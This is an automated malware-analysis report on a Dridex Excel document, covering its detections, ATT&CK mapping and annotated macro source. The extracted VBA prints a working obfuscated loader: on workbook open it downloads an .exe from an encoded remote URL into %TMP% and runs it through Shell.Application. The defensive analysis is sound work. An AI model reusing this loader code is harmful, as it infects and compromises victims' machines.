Dridex — Office (OLE) malware analysis

Static analysis result for SHA-256 189f436ca27dc657…

MALICIOUS

Office (OLE)

37.5 KB · Created: 1996-10-08 23:32:33 · Authoring application: Microsoft Excel · First seen: 2015-03-15
MD5: 00d3b0f0c0d9c85024a32175eb2f7589 SHA-1: e7184de07c4aa8cd2c23ce9c33ef58200ca538f7 SHA-256: 189f436ca27dc657552eafc9b39f21b7dee873f4669c1ce9d7c11eb39fbec89d
356 Risk Score

Malware Insights

Dridex · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File · T1059 Command and Scripting Interpreter · T1566.001 Spearphishing Attachment

The sample is an Excel file containing obfuscated VBA macros that execute when the workbook is opened. The Workbook_Open macro, through the helper routines it calls, uses the URLDownloadToFileA import to download a second-stage payload to disk and then execute it, a common technique for malware like Dridex. The ClamAV detection of Xls.Trojan.Dridex-5 further supports this family attribution.

Heuristics 9

  • ClamAV: Xls.Trojan.Dridex-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Dridex-5
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set ываААвыаыва = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ываААвыаыва = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    & Chr$(96) & Chr$(120) & Chr$(99) & Chr$(101) & Chr$(62)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6631 bytes
SHA-256: 57d028020bc4d66f0d4f7c7f527a329a811ce0afa0b78bb981b55636ca8d43a8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-exec entry point: runs when the workbook is opened (ThisWorkbook module,
' named "ЭтаКнига" here). Its only statement calls the loader routine
' atqk_x482mp6v, so no download/exec indicators appear in this module itself.
Sub Workbook_Open()
atqk_x482mp6v
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "АавпавпАА"

' String de-obfuscator used by every Chr$() chain in this macro set.
' Walks the input with Step 2 and keeps the character at each odd
' (1-based) position, so every second character of the encoded string is
' filler that is discarded. The filler includes byte values above 127
' (Chr$(129)..Chr$(134)), which is why the encoded literals look like
' mojibake rather than plain ASCII.
' Analyst note: the real strings can be recovered offline by applying the
' same every-other-character selection to the Chr$() sequences; no key
' or runtime state is involved.
Public Function tIBlTVqSYlvQeRDfBAc(VdkAbaqgjbz As String) As String
For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
tIBlTVqSYlvQeRDfBAc = tIBlTVqSYlvQeRDfBAc & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
Next
End Function


Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "ываывААва"
' Win32 import of urlmon!URLDownloadToFileA under a randomized alias
' (гшПНШываа). The two branches only differ in pointer width: the VBA7
' branch uses PtrSafe/LongPtr for 64-bit Office, the legacy branch uses
' Long. The Declare line itself is the SC_STR_URLDOWNLOAD /
' OLE_VBA_DOWNLOAD match; the five parameters are the standard
' (pCaller, szURL, szFileName, dwReserved, lpfnCB) signature.
#If VBA7 Then
    ' 64-bit / VBA7 Office.
    Private Declare PtrSafe Function гшПНШываа Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
    ByVal ПСрпспсппОап As String, _
    ByVal ПСрпспсппОапf As String, _
    ByVal ПСрпспсппОапfd As Long, _
    ByVal ПСрпспсппОапfds As LongPtr) As LongPtr
#Else
    ' 32-bit / pre-VBA7 Office.
    Private Declare Function гшПНШываа Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
    ByVal ПСрпспсппОап As String, _
    ByVal ПСрпспсппОапf As String, _
    ByVal ПСрпспсппОапfd As Long, _
    ByVal ПСрпспсппОапfds As Long) As Long
#End If
Sub atqk_x482mp6v()
' Stage-1 loader called from Workbook_Open. Builds two decoded strings and
' passes them to рпорпАавпавп (download + execute):
'   arg 1: the payload URL. NOTE(review): applying the every-other-character
'          decoder offline yields an http:// URL ending in ".exe"; confirm
'          with a decoder before using it as an IoC.
'   arg 2: Environ(<decoded>) & <decoded>; the Environ argument decodes to
'          "TMP" and the suffix to a backslash plus a random-looking
'          ".exe" name, i.e. the drop path lives under %TMP%.
' Detection angle: EXCEL.EXE loading urlmon and writing an .exe into the
' user's temp directory, followed by a child process from that path.
рпорпАавпавп tIBlTVqSYlvQeRDfBAc(Chr$(104) & Chr$(43) & Chr$(116) & Chr$(83) & Chr$(116) & Chr$(38) & Chr$(112) & Chr$(47) & Chr$(58) & Chr$(73) & Chr$(47) & Chr$(93) & Chr$(47) & Chr$(134) & Chr$(48) & Chr$(60) & Chr$(51) & Chr$(35) & Chr$(52) & Chr$(109) & Chr$(48) & Chr$(61) & Chr$(52) & Chr$(104) & Chr$(101) & Chr$(102) & Chr$(98) & Chr$(56) & Chr$(46) & Chr$(120) & Chr$(110) & Chr$(54) & Chr$(101) & Chr$(126) & Chr$(116) & Chr$(134) & Chr$(115) & Chr$(84) & Chr$(111) & Chr$(35) & Chr$(108) & Chr$(56) & Chr$(104) & Chr$(45) & Chr$(111) & Chr$(80) & Chr$(115) & Chr$(74) & Chr$(116) & Chr$(118) & Chr$(46) & Chr$(60) & Chr$(99) & Chr$(107) & Chr$(111) & Chr$(92) & Chr$(109) & Chr$(84) & Chr$(47) & Chr$(107) & Chr$(106) & Chr$(40) & Chr$(115) & Chr$(68) & Chr$(47) & Chr$(109) & Chr$(98) & Chr$(86) & Chr$(105) & Chr$(104) & Chr$(110) & Chr$(49) & Chr$(46) & Chr$(39) & Chr$(101) _
& Chr$(96) & Chr$(120) & Chr$(99) & Chr$(101) & Chr$(62)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
109) & Chr$(80) & Chr$(123))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))
' The Boolean result of рпорпАавпавп is discarded; nothing here checks
' whether the download succeeded.

End Sub
' Download-and-execute sink. z0ktwRXRQZl2qo0_ is the URL, d4ok1z1Z0N the
' local destination path (both already decoded by the caller).
' Declared As Boolean but never assigns its own name, so it always returns
' the default False regardless of outcome.
Function рпорпАавпавп(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
' URLDownloadToFileA(NULL, url, path, 0, NULL). The HRESULT is stored in
' плрпААавпп but never inspected, so execution is attempted even if the
' download failed.
плрпААавпп = гшПНШываа(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
' The Chr$() chain below decodes to "Shell.Application" via the
' every-other-character decoder; the ProgID never appears literally in the
' source, which is what the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER rule flags.
Set ываААвыаыва = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
' Shell.Application.Open on the dropped file: Environ("TMP") & "\<name>.exe"
' after decoding, which re-derives the same path the caller passed in
' d4ok1z1Z0N rather than reusing the parameter. This is the execution step.
ываААвыаыва.Open Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
End Function